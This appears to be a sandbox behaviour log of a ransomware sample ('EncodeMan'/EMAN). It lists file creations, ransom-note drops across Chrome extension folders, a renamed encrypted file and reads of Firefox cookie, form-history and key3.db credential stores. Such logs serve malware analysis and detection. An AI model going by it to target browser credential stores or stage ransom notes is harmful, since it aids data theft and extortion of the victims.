| Create | C:\Users\CIiHmnxMn6Ps\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.9_0\_locales\vi\messages.json | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.8_0\_locales\hi\messages.json | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Desktop\bad_460F9943EA70F103.txt | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.9_0\_locales\sl\messages.json | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\AppData\Local\Google\Chrome\User Data\Default\Cache\f_000010 | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.4_0\_locales\vi\messages.json | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap\1.1_0\_locales\ca\messages.json | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.4_1\_locales\sk\messages.json | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.8_0\_locales\ja\messages.json | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Mozilla Firefox\plugin-hang-ui.exe | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.1_0\_locales\cs\messages.json | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\AppData\Local\Google\Chrome\User Data\Crashpad\#README_EMAN#.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek\0.9_0\_locales\ca\#README_EMAN#.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek\0.9_0\_locales\en_US\#README_EMAN#.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek\0.9_0\_locales\fi\#README_EMAN#.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek\0.9_0\_locales\id\#README_EMAN#.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek\0.9_0\_locales\ja\#README_EMAN#.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek\0.9_0\_locales\lt\#README_EMAN#.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek\0.9_0\_locales\pt_BR\#README_EMAN#.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek\0.9_0\_locales\ro\#README_EMAN#.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek\0.9_0\_locales\sk\#README_EMAN#.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek\0.9_0\_locales\uk\#README_EMAN#.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek\0.9_0\_locales\zh_CN\#README_EMAN#.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek\0.9_0\_metadata\#README_EMAN#.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.9_0\_locales\bg\#README_EMAN#.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.9_0\_locales\cs\#README_EMAN#.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.9_0\_locales\es\#README_EMAN#.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.9_0\_locales\et\#README_EMAN#.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.9_0\_locales\fil\#README_EMAN#.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.9_0\_locales\it\#README_EMAN#.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.9_0\_locales\ko\#README_EMAN#.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.9_0\_locales\pt_PT\#README_EMAN#.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.9_0\_locales\ru\#README_EMAN#.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.9_0\_locales\th\#README_EMAN#.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.9_0\_locales\zh_TW\#README_EMAN#.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.1_0\_locales\ar\#README_EMAN#.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.1_0\_locales\da\#README_EMAN#.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.1_0\_locales\de\#README_EMAN#.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Program Files (x86)\Mozilla Firefox\wow_helper.exe | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\AppData\Local\Google\Chrome\User Data\Default\Cache\f_00001b | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.9_0\_metadata\verified_contents.json | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.1_0\_locales\en_GB\messages.json | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.1_0\_locales\hi\messages.json | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.1_0\_locales\nl\messages.json | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.1_0\_locales\sv\messages.json | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.8_0\_locales\ar\messages.json | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.1_0\_locales\es_419\#README_EMAN#.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.1_0\_locales\fil\#README_EMAN#.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.1_0\_locales\fr\#README_EMAN#.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.1_0\_locales\id\#README_EMAN#.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.1_0\_locales\lt\#README_EMAN#.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.8_0\_locales\ru\messages.json | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.4_1\eventpage_bin_prod.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap\1.1_0\_locales\fi\messages.json | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.4_1\_locales\ur\messages.json | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.1_0\_locales\fi\messages.json | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.8_0\_locales\no\messages.json | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.1_0\_locales\lv\#README_EMAN#.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.1_0\_locales\pt_BR\#README_EMAN#.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.1_0\_locales\sk\#README_EMAN#.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.1_0\_locales\sl\#README_EMAN#.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.1_0\_locales\uk\#README_EMAN#.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.1_0\_metadata\#README_EMAN#.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.8_0\_locales\cs\#README_EMAN#.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.8_0\_locales\en\#README_EMAN#.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.8_0\_locales\it\#README_EMAN#.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.8_0\_locales\ro\#README_EMAN#.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap\1.1_0\_locales\da\#README_EMAN#.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap\1.1_0\_locales\fr\#README_EMAN#.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap\1.1_0\_locales\ms\#README_EMAN#.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap\1.1_0\_locales\sr\#README_EMAN#.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.4_0\#README_EMAN#.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.4_0\_locales\bg\#README_EMAN#.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.4_0\_locales\es_419\#README_EMAN#.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.4_0\_locales\fr\#README_EMAN#.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.4_0\_locales\hi\#README_EMAN#.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.4_0\_locales\it\#README_EMAN#.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.4_0\_locales\km\#README_EMAN#.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.4_0\_locales\ml\#README_EMAN#.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.4_0\_locales\ne\#README_EMAN#.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.4_0\_locales\ro\#README_EMAN#.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.4_0\_locales\th\#README_EMAN#.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.4_0\_metadata\#README_EMAN#.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.8_0\_locales\fil\messages.json | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.4_1\_locales\cs\messages.json | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.8_0\_locales\zh_TW\messages.json | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap\1.1_0\_locales\lt\messages.json | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Move | C:\Program Files (x86)\[EncodeMan@qq.com].kdzevfRp-Y9CoPYha.EMAN | source_filename = C:\Program Files (x86)\desktop.ini, flags = MOVEFILE_REPLACE_EXISTING |
|
1 | |
| Read | C:\Users\CIiHmnxMn6Ps\AppData\Local\Mozilla\Firefox\Profiles\8i341t8m.default\OfflineCache\index.sqlite | size = 32768, size_out = 32768 |
|
1 | |
| Read | C:\Users\CIiHmnxMn6Ps\AppData\Local\Mozilla\Firefox\Profiles\8i341t8m.default\OfflineCache\index.sqlite | size = 8192, size_out = 8192 |
|
1 | |
| Read | C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Mozilla\Firefox\Profiles\8i341t8m.default\cookies.sqlite | size = 32768, size_out = 32768 |
|
1 | |
| Read | C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Mozilla\Firefox\Profiles\8i341t8m.default\cookies.sqlite | size = 8192, size_out = 8192 |
|
1 | |
| Read | C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Mozilla\Firefox\Profiles\8i341t8m.default\formhistory.sqlite | size = 32768, size_out = 32768 |
|
1 | |
| Read | C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Mozilla\Firefox\Profiles\8i341t8m.default\places.sqlite | size = 61440, size_out = 61440 |
|
17 | |
| Read | C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Mozilla\Firefox\Profiles\8i341t8m.default\formhistory.sqlite | size = 8192, size_out = 8192 |
|
1 | |
| Read | C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Mozilla\Firefox\Profiles\8i341t8m.default\key3.db | size = 4096, size_out = 4096 |
|
1 | |
| Read | C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Mozilla\Firefox\Profiles\8i341t8m.default\places.sqlite | size = 4096, size_out = 4096 |
|
1 | |
| Read | C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Mozilla\Firefox\Profiles\8i341t8m.default\places.sqlite | size = 16384, size_out = 16384 |
|
1 | |
| Read | C:\Users\CIiHmnxMn6Ps\AppData\Local\Google\Chrome\User Data\Default\Cache\f_000003 | size = 4096, size_out = 4096 |
|
2 | |
